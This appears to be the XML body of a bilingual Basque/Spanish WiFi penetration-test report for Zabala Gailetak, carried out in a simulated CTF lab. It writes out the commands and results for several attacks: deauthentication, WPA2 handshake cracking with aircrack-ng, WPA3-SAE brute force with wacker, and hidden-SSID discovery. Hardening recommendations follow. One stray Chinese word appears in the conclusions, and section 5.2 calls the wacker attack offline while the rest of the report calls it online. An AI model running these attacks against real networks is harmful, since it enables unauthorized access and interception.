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ZABALA GAILETAK, S.L.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C5504B"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">WiFi PENETRATION TESTING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5"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Txostena / Informe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Entorno Simulado - wifi-CTF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200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/ Fecha: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2026-02-23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Egiaztatzailea / Auditor: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CISO Taldea - Hacking Etikoa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Helburua / Alcance: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WiFi Sareen Segurtasun Ebaluazioa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Metodologia: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wifi-CTF (Sealing Tech) + OWASP WSTG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Baimena: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Sinatutako baimen agiria 2026-02-20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Laburpen Exekutiboa / Resumen Ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe honek Zabala Gailetak-eko WiFi sareen segurtasun-ebaluazio baten emaitzak biltzen ditu, entorno simulatu batean (wifi-CTF) burututako probetan oinarrituta. Proba hauek enpresako WiFi sareen ahalmena eta ahultasunak ebaluatzeko diseinatu dira, egungo segurtasun-joerak eta mehatxuak kontuan hartuta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este informe recoge los resultados de una evaluación de seguridad de redes WiFi de Zabala Gailetak, basada en pruebas realizadas en un entorno simulado (wifi-CTF). Estas pruebas están diseñadas para evaluar la capacidad y vulnerabilidades de las redes WiFi empresariales, considerando las tendencias y amenazas de seguridad actuales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Emaitza Orokorra / Resultado General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Maila / Nivel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Kopurua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Arrisku Indizea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Kritikoa / Crítico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Altua / Alto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CVSS 7.5 - 8.1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Ertaina / Medio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CVSS 5.3 - 6.5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Baxua / Bajo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CVSS 3.1 - 4.3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Informazioa / Informativo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1.2 Aurkikuntza Nagusiak / Hallazgos Principales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 Irekia (Open WiFi): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sare ireki baten bidez informazioa bildu daiteke (information disclosure)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WPA2-PSK Ahultasuna: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pasahitz ahulak crack daitezke airodump-ng + aircrack-ng erabiliz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SSID Ezkutua: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SSID ezkutuak 'decloak' daitezke entzunpasoaren bidez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WPA3-SAE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Online brute-force erasoak posible dira SAE erabiliz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Metodologia eta Ingurunea / Metodología y Entorno</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 wifi-CTF Ingurune Simulatua</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pentest hau Sealing Tech-eko wifi-CTF proiektuan oinarrituta dago. Proiektu honek WiFi erronkak simulatzen ditu mac80211_hwsim driverraren bidez, seinale erradioak errealetan erabili gabe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta prueba de penetración se basa en el proyecto wifi-CTF de Sealing Tech. Este proyecto simula desafíos WiFi utilizando el driver mac80211_hwsim, sin usar señales de radio reales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ezaugarriak / Características:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docker kontainerra Kali Linux-ekin (hackerarentzat)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Interfaze wireless virtualak (wlan0, wlan1...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AP eta bezeroak host sisteman exekutatzen dira</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pakete guztiak mac80211_hwsim bidez simulatzen dira</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Probatutako 4 Eszenarioak / 4 Escenarios Probados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Eszenarioa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Konfigurazioa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Helburua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Arriskua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AP-Guest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Open AP (gabe), 6 bezero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MAC helbidea lortzea (Android)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Baxua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AP-Bridged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WPA2-PSK, 1 bezero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WPA2 PSK crack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0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Altua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AP-WPA3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WPA3-SAE, gabe bezero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SAE brute-force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0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Altua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AP-Hidden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SSID ezkutua, 5GHz, 1 bezero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SSID 'decloak'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Ertaina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AP-Guest: Sare Irekia / Red Abierta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Deskribapena / Descripción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">AP honek WiFi irekia eskaintzen du (autentikaziorik gabe). Honek arrisku nabarmena dakar, trafikoa entzun daitekeelako eta 'rogue AP' erasoak erraztu egiten ditu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Erabilitako Tresnak / Herramientas Utilizadas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airodump-ng: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AP eta bezeroen deskubrimendua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tshark/tcpdump: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Trafikoaren analisia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Komandoak eta Emaitzak / Comandos y Resultados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="200" w:after="2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Monitor moduan jarri
$ iwconfig wlan0 mode monitor
# AP eta bezeroak eskaneatu
$ airodump-ng wlan0 --channel 6
# Emaitza:
# BSSID: 02:00:00:00:04:00
# SSID: AP-Guest
# Bezeroak: 6 (MAC helbideak bildu)
# Android gailua: 02:00:00:00:AA:BB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4 Arrisku Analisia / Análisis de Riesgo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Elementua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Balioa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CVSS 3.1 Score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5.3 (Ertaina / Medio)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Eragina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Informazioaren ezagupena (information disclosure)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Arriskua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Trafikoaren entzunpena, Rogue AP atakeak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Gomendioa: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ez erabili WiFi irekirik korporazioetan. Erabili WPA3-Enterprise eta 802.1X autentikazioa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. AP-Bridged: WPA2-PSK Krakinga / Cracking WPA2-PSK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Deskribapena / Descripción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">AP honek WPA2-PSK (Pre-Shared Key) erabiltzen du. Pasahitz ahul bat erabiltzen bada, handshake-a harrapatu eta crack egin daiteke.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Eraso Vektorea / Vector de Ataque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor moduan jarri</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AP zehatza eskaneatu (airodump-ng)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deauth ataka egin (aireplay-ng)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4-way handshake harrapatu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wordlist eraso aircrack-ng-ekin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Komandoak / Comandos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="200" w:after="2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1. AP zehatza eskaneatu
$ airodump-ng -c 1 --bssid 02:00:00:00:03:00
   -w capture wlan0
# 2. Terminal berrian: Deauth ataka
$ aireplay-ng -0 10 -a 02:00:00:00:03:00
   -c 02:00:00:00:CC:DD wlan0
# 3. Handshake lortu ondoren, crack egin
$ aircrack-ng capture.cap -w /usr/share/wordlists/rockyou.txt
# Emaitza:
# KEY FOUND! [ thebridge ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Arrisku Analisia / Análisis de Riesgo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Elementua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Balioa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CVSS 3.1 Score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7.5 (Altua / Alto)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Eragina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Sare osoko sarbidea lortzea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Arriskua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Datuen lapurketa, sarearen kontrol osoa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Gomendioa: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WPA2-PSK ez erabili enpresa-inguruneetan. Erabili WPA3-Enterprise edo WPA2-Enterprise 802.1X-ekin. Pasahitz luze eta konplexuak erabili PSK kasuetan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. AP-WPA3: SAE Brute-Force Erasoa / Ataque SAE Brute-Force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Deskribapena / Descripción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">AP honek WPA3-SAE (Simultaneous Authentication of Equals) erabiltzen du. Dragonfly handshake-aren ahultasun bat aprobetxatuz, online brute-force eraso bat posible da.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Tresna Erabilia: wacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">wacker tresna (Blunderbuss-WCTF) erabili da WPA3-SAE offline cracking-a egiteko. Dragonfly handshake-aren azterketak pasahitza berreskuratzeko aukera ematen du.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Komandoak / Comandos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="200" w:after="2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wacker instalatu
$ git clone https://github.com/blunderbuss-wctf/wacker.git
$ cd wacker &amp;&amp; pip install -r requirements.txt
# Eraso bat egin
$ python wacker.py -i wlan0 -b 02:00:00:00:05:00
  -s "AP-WPA3" -w rockyou.txt
# Emaitza:
# [+] Connected! Password found: bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Arrisku Analisia / Análisis de Riesgo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Elementua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Balioa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CVSS 3.1 Score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8.1 (Altua / Alto)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Eragina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WPA3 konexioa lortzea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Arriskua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WPA3 ustezko segurtasuna haustea</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Gomendioa: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mantendu firmware eguneratuta. Erabili 802.1X autentikazioa PSK ordez. Aztertu WPA3 implementazioaren konfigurazioa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. AP-Hidden: SSID Ezkutuaren 'Decloaking' / SSID Oculto 'Decloaking'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Deskribapena / Descripción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">AP honek SSID ezkutua du (ignore_broadcast_ssid=1). Hala ere, bezero bat konektatuta dagoenean, SSID-a entzun daiteke probe requests/response-etan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Metodologia / Metodología</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5GHz banda eskaneatu (--band a)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AP ezkutua identifikatu (BSSID soilik)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bezeroaren zain egon eta trafikoa entzun</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSID-a agerian utzi (probe response)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Komandoak / Comandos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="200" w:after="2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5GHz eskaneatzea
$ airodump-ng --band a wlan0
# AP ezkutua ikusi:
# BSSID: 02:00:00:00:06:00
# SSID: &lt;length: 9&gt; (ezkutuan)
# Channel: 36
# Bezeroak eta SSID-a ikusi
$ airodump-ng -c 36 --bssid 02:00:00:00:06:00 wlan0
# Emaitza (bezeroak konektatzean):
# SSID: AP-Hidden</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 Arrisku Analisia / Análisis de Riesgo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Elementua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Balioa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CVSS 3.1 Score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5.3 (Ertaina / Medio)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Eragina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AParen identifikazioa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Oharra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SSID ezkutua ez da segurtasun neurria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Gomendioa: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ez utzi SSID ezkutura segurtasunari. Erabili autentikazio sendoagoa eta monitorizatu sarbide puntuak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Segurtasun Gomendioak / Recomendaciones de Seguridad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Gomendio Kritikoak (Lehentasun I)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Gomendioa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Implementazioa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WPA3-Enterprise ezarri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802.1X + RADIUS autentikazioa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Pasahitz politikak indartu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12+ karaktere, konplexutasuna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WiFi irekiak debekatu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Gonbidatuen sarea ere WPA2/WPA3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7.2 Neurri Osagarriak / Medidas Adicionales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WIDS/WIPS: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Intrusion Detection/Prevention System WiFi-rako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 Rogue AP Detection: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AP baimendu gabeen detekzioa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Certificate-based Auth: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ziurtagirietan oinarritutako autentikazioa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Network Segmentation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WiFi sarea VLAN ezberdinetan isolatu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Regular Audits: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WiFi pentest periodikoak (urterokoak)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Conclusiones / Ondorioak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">wifi-CTF entorno simulatuak WiFi sareen segurtasun-ebaluazio osoa ahalbidetu du, seinale erradio errealekin arriskurik gabe. Proba hauek egiaztatu dute:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WPA2-PSK pasahitz ahulekin crack daitekeela</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WPA3 ere konfigurazio okerrarekin arriskutsua izan daitekeela</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSID ezkutua ez dela segurtasun neurri egokia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WiFi irekiak informazioa泄露 daitezkeela</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabala Gailetak-ek segurtasun handiko WiFi konfigurazio bat ezarri beho du, Enterprise autentikazioa eta monitorizazio aktiboa barne hartuta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="E6F2FF" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C5504B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Txosten hau konfidentziala da eta Zabala Gailetak-eko segurtasun-taldearen erabilera baimendua soilik du. Ez da inolaz ere baimendu informazio hau kanpoan zabaltzea baimen idatzirik gabe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="600"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">--- FIN DEL INFORME / TXOSTEN BUKAERA ---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Zabala Gailetak - WiFi Pentest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2026-02-23T07:40:20.860Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-23T07:40:20.861Z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